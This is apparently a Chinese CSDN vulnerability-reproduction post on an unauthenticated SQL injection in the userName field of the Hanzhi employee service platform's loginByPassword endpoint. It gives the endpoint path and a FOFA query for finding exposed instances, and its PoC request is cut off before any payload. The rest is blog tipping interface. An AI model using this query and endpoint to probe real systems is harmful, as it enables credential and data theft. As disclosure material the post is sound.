翰智员工服务平台 loginByPassword SQL注入漏洞复现

本文详细介绍了翰智员工服务平台loginByPassword接口存在的SQL注入漏洞,该漏洞由于未对userName字段进行严格的数据校验,允许攻击者获取数据库敏感信息,影响系统安全。文中还提供了漏洞复现环境及PoC,并给出了修复建议,包括限制接口访问权限和升级至安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

翰智员工服务平台以其全天候、全场景、全渠道的服务特点,结合先进的智能技术,为企业提供了一套高效、便捷的员工服务解决方案。通过该平台,企业可以实现对员工全生命周期的管理,提升员工满意度和敬业度,同时降低运营成本,提高管理效率。成功应用于多个大型企业,如雅居乐、南方航空等,帮助企业实现了财务人力双共享、管理升级、提高员工满意度及敬业度等目标。

0x02 漏洞概述

由于翰智员工服务平台登录接口 loginByPassword 处userName字段未对传入的数据进行严格校验和过滤,直接带入到数据库执行,导致造成SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,获取有效凭证及口令,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="./static/hrfonts/iconfont.css"

0x04 漏洞复现

PoC

POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
Host: your-ip
User-Agent: Mozil
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值